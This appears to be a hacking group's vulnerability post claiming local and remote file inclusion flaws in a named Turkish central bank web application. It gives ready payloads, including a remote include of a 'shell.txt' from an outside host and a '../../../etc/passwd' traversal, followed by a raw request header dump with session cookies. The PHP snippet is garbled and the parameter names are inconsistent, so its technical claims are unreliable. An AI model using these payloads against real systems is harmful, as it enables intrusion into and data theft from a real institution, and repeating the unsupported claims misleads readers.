Vulnerability Author : Gaddar Team : SiyahBayrak TeamMates : Deadly-Warrior ~ StabilBey ~ Diablo Vendor HomePage : tcmb.gov.tr Vuln. URL : https://evds2.tcmb.gov.tr/index.php?/evds/serieMarket Description; Thanks to this vulnerability, remote code and files can be executed. Legal data of the site is stored. The source of the site includes php and lfi/rfi. Payload : index.php?sayfa= Example : index.php?sayfa=https://target.com/shell.txt Remote Codes; index.php <?php include ('data/$home/.../index.php'); ?> Payload URL : index.php?data=../../../etc/passwd PREVIEW; Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: keep-alive Cookie: BIGipServerEVDS2_HTTPS_POOL=1913432256.47873.0000; JSESSIONID=C7CA3B3E8343A73D36E9E01A25A7EF92; TS013c5758=015d31d691e014116d0f047d3655d2145c0949f6d903ddb8f7d3cba23d3804da926581ee0c2deb034ed073ab3b5fe39632f1879f7c295ca0b2040dcbf0c2bdccddb4e086d9a3bd63aa0aa6e3c227bca89adcfa9a7f Host: evds2.tcmb.gov.tr If-Modified-Since: Fri, 17 Jan 2020 13:02:06 GMT If-None-Match: W/"105932-1579266126000" Referer: https://evds2.tcmb.gov.tr/index.php? Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36